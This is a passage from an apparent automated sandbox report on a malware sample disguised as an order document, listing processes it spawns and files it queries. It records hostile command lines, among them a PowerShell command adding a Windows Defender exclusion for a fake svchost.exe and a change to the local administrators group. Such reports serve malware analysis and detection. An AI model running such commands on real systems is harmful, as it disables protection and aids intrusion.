                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "user" /delJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
